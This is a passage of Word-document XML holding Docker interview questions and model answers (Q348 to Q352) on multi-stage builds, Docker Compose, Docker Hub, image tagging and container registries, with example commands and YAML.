        <w:t>Benefits</w:t>
        <w:br/>
        <w:t>✅ Smaller image size</w:t>
        <w:br/>
        <w:t>✅ Faster image pulls and deployments</w:t>
        <w:br/>
        <w:t>✅ Reduced attack surface</w:t>
        <w:br/>
        <w:t>✅ Better security compliance</w:t>
        <w:br/>
        <w:t>✅ Cleaner production images</w:t>
        <w:br/>
        <w:t>✅ Lower storage costs</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Real-World Example</w:t>
        <w:br/>
        <w:t>Without multi-stage:</w:t>
        <w:br/>
        <w:t>Ubuntu + JDK + Maven + Source Code + JAR</w:t>
        <w:br/>
        <w:t>= 900 MB</w:t>
        <w:br/>
        <w:t>With multi-stage:</w:t>
        <w:br/>
        <w:t>JRE + Application JAR</w:t>
        <w:br/>
        <w:t>= 150 MB</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>A multi-stage build is a Docker image optimization technique that uses multiple FROM instructions within a single Dockerfile. The first stage is typically used for compiling or building the application, while the final stage contains only the runtime dependencies and build artifacts. This significantly reduces image size, improves security by excluding build tools, and speeds up image distribution. In production environments, multi-stage builds are considered a best practice for creating lean and efficient container images.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q348. Explain Docker Compose.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is Docker Compose?</w:t>
        <w:br/>
        <w:t>Docker Compose is a tool used to define and manage multi-container Docker applications using a YAML configuration file (docker-compose.yml).</w:t>
        <w:br/>
        <w:t>Instead of running multiple docker run commands manually, you define all services in a single file and start them together.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Docker Compose?</w:t>
        <w:br/>
        <w:t>Suppose your application consists of:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Frontend (React)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Backend (Spring Boot)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Database (MySQL)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Redis Cache</w:t>
        <w:br/>
        <w:t>Without Compose:</w:t>
        <w:br/>
        <w:t>docker run ...</w:t>
        <w:br/>
        <w:t>docker run ...</w:t>
        <w:br/>
        <w:t>docker run ...</w:t>
        <w:br/>
        <w:t>docker run ...</w:t>
        <w:br/>
        <w:t>Managing networking, volumes, and dependencies becomes difficult.</w:t>
        <w:br/>
        <w:t>With Compose:</w:t>
        <w:br/>
        <w:t>docker compose up -d</w:t>
        <w:br/>
        <w:t>Everything starts automatically.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example docker-compose.yml</w:t>
        <w:br/>
        <w:t>version: "3.9"</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>services:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  web:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    image: nginx</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ports:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - "80:80"</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  database:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    image: mysql:8</w:t>
        <w:br/>
        <w:t xml:space="preserve">    environment:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      MYSQL_ROOT_PASSWORD: password</w:t>
        <w:br/>
        <w:t>Start services:</w:t>
        <w:br/>
        <w:t>docker compose up -d</w:t>
        <w:br/>
        <w:t>Stop services:</w:t>
        <w:br/>
        <w:t>docker compose down</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Architecture</w:t>
        <w:br/>
        <w:t>docker-compose.yml</w:t>
        <w:br/>
        <w:t xml:space="preserve">        │</w:t>
        <w:br/>
        <w:t xml:space="preserve">        ▼</w:t>
        <w:br/>
        <w:t>Docker Compose</w:t>
        <w:br/>
        <w:t xml:space="preserve">        │</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ┌──────┴──────┐</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ▼             ▼</w:t>
        <w:br/>
        <w:t>Web Container  DB Container</w:t>
        <w:br/>
        <w:t xml:space="preserve">        │</w:t>
        <w:br/>
        <w:t xml:space="preserve">        ▼</w:t>
        <w:br/>
        <w:t>Docker Network</w:t>
        <w:br/>
        <w:t>All services are connected through a default network created by Compose.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key Components</w:t>
        <w:br/>
        <w:t>Services</w:t>
        <w:br/>
        <w:t>Defines containers to run.</w:t>
        <w:br/>
        <w:t>services:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  app:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    image: myapp</w:t>
        <w:br/>
        <w:t>Networks</w:t>
        <w:br/>
        <w:t>Allows containers to communicate.</w:t>
        <w:br/>
        <w:t>networks:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  app-network:</w:t>
        <w:br/>
        <w:t>Volumes</w:t>
        <w:br/>
        <w:t>Persists data beyond container lifecycle.</w:t>
        <w:br/>
        <w:t>volumes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  mysql-data:</w:t>
        <w:br/>
        <w:t>Environment Variables</w:t>
        <w:br/>
        <w:t>environment:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  DB_HOST: mysql</w:t>
        <w:br/>
        <w:t xml:space="preserve">  DB_PORT: 3306</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Real-World Example</w:t>
        <w:br/>
        <w:t>version: "3.9"</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>services:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  frontend:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    image: nginx</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ports:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - "80:80"</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  backend:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    image: springboot-app</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ports:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - "8080:8080"</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  mysql:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    image: mysql:8</w:t>
        <w:br/>
        <w:t xml:space="preserve">    environment:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      MYSQL_ROOT_PASSWORD: admin</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>volumes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  mysql-data:</w:t>
        <w:br/>
        <w:t>Start complete application:</w:t>
        <w:br/>
        <w:t>docker compose up -d</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Useful Commands</w:t>
        <w:br/>
        <w:t>Command</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Description</w:t>
        <w:br/>
        <w:tab/>
        <w:t>docker compose up -d</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Start services in background</w:t>
        <w:br/>
        <w:tab/>
        <w:t>docker compose down</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Stop and remove services</w:t>
        <w:br/>
        <w:tab/>
        <w:t>docker compose ps</w:t>
        <w:br/>
        <w:tab/>
        <w:t>List running services</w:t>
        <w:br/>
        <w:tab/>
        <w:t>docker compose logs</w:t>
        <w:br/>
        <w:tab/>
        <w:t>View logs</w:t>
        <w:br/>
        <w:tab/>
        <w:t>docker compose restart</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Restart services</w:t>
        <w:br/>
        <w:tab/>
        <w:t>docker compose pull</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Pull latest images</w:t>
        <w:br/>
        <w:tab/>
        <w:t>docker compose build</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Build images</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Docker Compose vs Kubernetes</w:t>
        <w:br/>
        <w:t>Docker Compose</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Kubernetes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Local development</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Production orchestration</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Single host</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Multi-node clusters</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Simple setup</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Advanced orchestration</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Basic scaling</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Auto-scaling &amp; self-healing</w:t>
        <w:br/>
        <w:tab/>
        <w:t>YAML-based</w:t>
        <w:br/>
        <w:tab/>
        <w:t>YAML-based</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>Docker Compose is a tool for defining and managing multi-container applications using a YAML file called docker-compose.yml. It allows developers to declare services, networks, volumes, environment variables, and dependencies in a single configuration file. Compose simplifies local development, testing, and CI/CD workflows by enabling multiple containers to be deployed and managed with a single command. While Docker Compose is commonly used for development environments, Kubernetes is typically preferred for large-scale production orchestration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q349. What is Docker Hub?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is Docker Hub?</w:t>
        <w:br/>
        <w:t>Docker Hub is a cloud-based container image registry where Docker images are stored, shared, and distributed.</w:t>
        <w:br/>
        <w:t>It is provided by  Docker Hub and serves as the default public registry for Docker images.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Use Docker Hub?</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Store Docker images centrally</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Share images with teams</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Download official images</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Version control container images</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Integrate with CI/CD pipelines</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Docker Hub Architecture</w:t>
        <w:br/>
        <w:t>Developer</w:t>
        <w:br/>
        <w:t xml:space="preserve">    │</w:t>
        <w:br/>
        <w:t>docker push</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ▼</w:t>
        <w:br/>
        <w:t>Docker Hub Registry</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ▲</w:t>
        <w:br/>
        <w:t>docker pull</w:t>
        <w:br/>
        <w:t xml:space="preserve">    │</w:t>
        <w:br/>
        <w:t>Docker Host</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Types of Repositories</w:t>
        <w:br/>
        <w:t>1. Public Repository</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Accessible to everyone</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Suitable for open-source projects</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>docker pull nginx</w:t>
        <w:br/>
        <w:t>docker pull ubuntu</w:t>
        <w:br/>
        <w:t>2. Private Repository</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Restricted access</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Used for proprietary applications</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common Operations</w:t>
        <w:br/>
        <w:t>Login</w:t>
        <w:br/>
        <w:t>docker login</w:t>
        <w:br/>
        <w:t>Pull Image</w:t>
        <w:br/>
        <w:t>docker pull nginx:latest</w:t>
        <w:br/>
        <w:t>Tag Image</w:t>
        <w:br/>
        <w:t>docker tag myapp:v1 username/myapp:v1</w:t>
        <w:br/>
        <w:t>Push Image</w:t>
        <w:br/>
        <w:t>docker push username/myapp:v1</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Official Images</w:t>
        <w:br/>
        <w:t>Docker Hub maintains verified images for popular software such as:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Nginx</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Redis</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * MySQL</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * PostgreSQL</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * MongoDB</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Apache Kafka</w:t>
        <w:br/>
        <w:t>These images are maintained and verified for reliability.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Image Naming Convention</w:t>
        <w:br/>
        <w:t>username/repository:tag</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>akhilesh/myapp:v1</w:t>
        <w:br/>
        <w:t>Where:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * akhilesh → Namespace/User</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * myapp → Repository</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * v1 → Tag</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Docker Hub vs Other Registries</w:t>
        <w:br/>
        <w:t>Registry</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Provider</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Docker Hub</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Docker</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Amazon ECR</w:t>
        <w:br/>
        <w:tab/>
        <w:t>AWS</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Azure Container Registry (ACR)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Microsoft Azure</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Google Artifact Registry</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Google Cloud</w:t>
        <w:br/>
        <w:tab/>
        <w:t>GitHub Container Registry (GHCR)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>GitHub</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>Docker Hub is a cloud-hosted container registry used to store, manage, and distribute Docker images. It provides both public and private repositories and serves as Docker’s default image registry. Developers can push custom images, pull official images, and integrate Docker Hub with CI/CD pipelines for automated image management. In enterprise environments, alternatives such as Amazon ECR, Azure Container Registry, or Google Artifact Registry are often used for enhanced security and governance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q350. Explain image tagging.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is Image Tagging in Docker?</w:t>
        <w:br/>
        <w:t>Image tagging is the process of assigning a name and version (tag) to a Docker image so that it can be uniquely identified, managed, and deployed.</w:t>
        <w:br/>
        <w:t>Image Format</w:t>
        <w:br/>
        <w:t>repository:tag</w:t>
        <w:br/>
        <w:t>Examples:</w:t>
        <w:br/>
        <w:t>nginx:latest</w:t>
        <w:br/>
        <w:t>ubuntu:22.04</w:t>
        <w:br/>
        <w:t>myapp:v1.0.0</w:t>
        <w:br/>
        <w:t>Where:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Repository → Image name</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Tag → Version or identifier</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Use Tags?</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Version control images</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Track releases</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Enable rollbacks</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Support CI/CD deployments</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Avoid ambiguity of latest</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>Build an image:</w:t>
        <w:br/>
        <w:t>docker build -t myapp:v1 .</w:t>
        <w:br/>
        <w:t>List images:</w:t>
        <w:br/>
        <w:t>docker images</w:t>
        <w:br/>
        <w:t>Output:</w:t>
        <w:br/>
        <w:t>REPOSITORY   TAG</w:t>
        <w:br/>
        <w:t>myapp        v1</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Tagging an Existing Image</w:t>
        <w:br/>
        <w:t>docker tag myapp:v1 myapp:v2</w:t>
        <w:br/>
        <w:t>Now both tags point to the same image:</w:t>
        <w:br/>
        <w:t>myapp:v1</w:t>
        <w:br/>
        <w:t>myapp:v2</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Tag Before Pushing to Registry</w:t>
        <w:br/>
        <w:t>docker tag myapp:v1 username/myapp:v1</w:t>
        <w:br/>
        <w:t>docker push username/myapp:v1</w:t>
        <w:br/>
        <w:t>Image name becomes:</w:t>
        <w:br/>
        <w:t>username/myapp:v1</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common Tagging Strategies</w:t>
        <w:br/>
        <w:t>Version-Based</w:t>
        <w:br/>
        <w:t>myapp:v1.0</w:t>
        <w:br/>
        <w:t>myapp:v1.1</w:t>
        <w:br/>
        <w:t>myapp:v2.0</w:t>
        <w:br/>
        <w:t>Environment-Based</w:t>
        <w:br/>
        <w:t>myapp:dev</w:t>
        <w:br/>
        <w:t>myapp:test</w:t>
        <w:br/>
        <w:t>myapp:prod</w:t>
        <w:br/>
        <w:t>Build Number</w:t>
        <w:br/>
        <w:t>myapp:build-105</w:t>
        <w:br/>
        <w:t>myapp:build-106</w:t>
        <w:br/>
        <w:t>Git Commit SHA</w:t>
        <w:br/>
        <w:t>myapp:a3f8d9c</w:t>
        <w:br/>
        <w:t>Common in CI/CD pipelines because each image is uniquely traceable.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What is</w:t>
        <w:br/>
        <w:t>latest</w:t>
        <w:br/>
        <w:t>?</w:t>
        <w:br/>
        <w:t>docker pull nginx:latest</w:t>
        <w:br/>
        <w:t>latest is simply a tag name.</w:t>
        <w:br/>
        <w:t>It does not necessarily mean the newest version. It refers to whatever image was most recently tagged as latest.</w:t>
        <w:br/>
        <w:t>Best Practice: Use explicit version tags.</w:t>
        <w:br/>
        <w:t>nginx:1.29.1</w:t>
        <w:br/>
        <w:t>instead of:</w:t>
        <w:br/>
        <w:t>nginx:latest</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>View Image Tags</w:t>
        <w:br/>
        <w:t>docker images</w:t>
        <w:br/>
        <w:t>or</w:t>
        <w:br/>
        <w:t>docker image ls</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>Docker image tagging is the mechanism used to assign a repository name and version identifier to a container image. Tags help manage image versions, support deployments across environments, and enable rollback strategies. An image can have multiple tags pointing to the same image ID. In enterprise CI/CD pipelines, tags are commonly based on application versions, build numbers, or Git commit hashes. Using immutable version tags instead of latest is considered a best practice to ensure deployment consistency and traceability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q351. What is container registry?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is a Container Registry?</w:t>
        <w:br/>
        <w:t>A Container Registry is a centralized repository used to store, manage, version, and distribute container images.</w:t>
        <w:br/>
        <w:t>It acts as a library where container images are pushed and pulled by developers, CI/CD pipelines, and orchestration platforms like Kubernetes.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Do We Need a Container Registry?</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Store Docker/container images centrally</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Share images across teams</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Version control images</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Secure image distribution</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Integrate with CI/CD pipelines</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Deploy images to Kubernetes and cloud platforms</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Architecture</w:t>
        <w:br/>
        <w:t>Developer</w:t>
        <w:br/>
        <w:t xml:space="preserve">    │</w:t>
        <w:br/>
        <w:t>docker push</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ▼</w:t>
        <w:br/>
        <w:t>Container Registry</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ▲</w:t>
        <w:br/>
        <w:t>docker pull</w:t>
        <w:br/>
        <w:t xml:space="preserve">    │</w:t>
        <w:br/>
        <w:t>CI/CD / Kubernetes / Servers</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Workflow</w:t>
        <w:br/>
        <w:t>Build Image</w:t>
        <w:br/>
        <w:t>docker build -t myapp:v1 .</w:t>
        <w:br/>
        <w:t>Tag Image</w:t>
        <w:br/>
        <w:t>docker tag myapp:v1 myrepo/myapp:v1</w:t>
        <w:br/>
        <w:t>Push Image</w:t>
        <w:br/>
        <w:t>docker push myrepo/myapp:v1</w:t>
        <w:br/>
        <w:t>Pull Image</w:t>
        <w:br/>
        <w:t>docker pull myrepo/myapp:v1</w:t>
        <w:br/>
        <w:t>Run Container</w:t>
        <w:br/>
        <w:t>docker run myrepo/myapp:v1</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Popular Container Registries</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Docker Hub</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Amazon Elastic Container Registry (ECR)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Azure Container Registry (ACR)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Google Artifact Registry</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * GitHub Container Registry (GHCR)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Harbor</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Public vs Private Registry</w:t>
        <w:br/>
        <w:t>Public Registry</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Private Registry</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Accessible by everyone</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Restricted access</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Suitable for open source</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Suitable for enterprises</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Examples: Docker Hub public repos</w:t>
        <w:br/>
        <w:tab/>
        <w:t>ECR, ACR, Harbor</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Features</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Image storage</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Versioning and tagging</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Access control (RBAC)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Vulnerability scanning</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Image signing</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Replication</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Audit logging</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Kubernetes Example</w:t>
        <w:br/>
        <w:t>apiVersion: v1</w:t>
        <w:br/>
        <w:t>kind: Pod</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  containers:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - name: app</w:t>
        <w:br/>
        <w:t xml:space="preserve">    image: myrepo/myapp:v1</w:t>
        <w:br/>
        <w:t>When the pod starts:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               1. Kubernetes asks the container runtime to pull the image.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               2. The runtime downloads it from the registry.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               3. The container starts using that image.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>A container registry is a centralized service used to store, manage, and distribute container images. It enables developers and CI/CD pipelines to push versioned images and allows deployment platforms such as Kubernetes to pull and run them. Registries provide features such as image versioning, access control, vulnerability scanning, and lifecycle management. Common enterprise registries include Docker Hub, Amazon ECR, Azure Container Registry, Google Artifact Registry, and Harbor. In production environments, private registries are typically preferred for security and governance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q352. Explain private registries.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is a Private Container Registry?</w:t>
        <w:br/>
        <w:t>A private container registry is a container image repository that restricts access to authorized users, systems, and services.</w:t>
        <w:br/>
        <w:t>Unlike public registries, images stored in a private registry are not accessible to everyone on the internet.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Use Private Registries?</w:t>
        <w:br/>
        <w:t>Organizations use private registries to:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Store proprietary application images</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Protect intellectual property</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Control access using authentication and authorization</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Meet compliance and security requirements</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Integrate with enterprise CI/CD pipelines</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Architecture</w:t>
        <w:br/>
        <w:t>Developer</w:t>
        <w:br/>
        <w:t xml:space="preserve">    │</w:t>
        <w:br/>
        <w:t>docker push</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ▼</w:t>
        <w:br/>
        <w:t>Private Registry</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ▲</w:t>
        <w:br/>
        <w:t>docker pull</w:t>
        <w:br/>
        <w:t xml:space="preserve">    │</w:t>
        <w:br/>
        <w:t>Kubernetes / CI-CD / Servers</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Popular Private Registries</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Amazon Elastic Container Registry (ECR)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Azure Container Registry (ACR)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Google Artifact Registry</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Harbor</w:t>
        <w:br/>
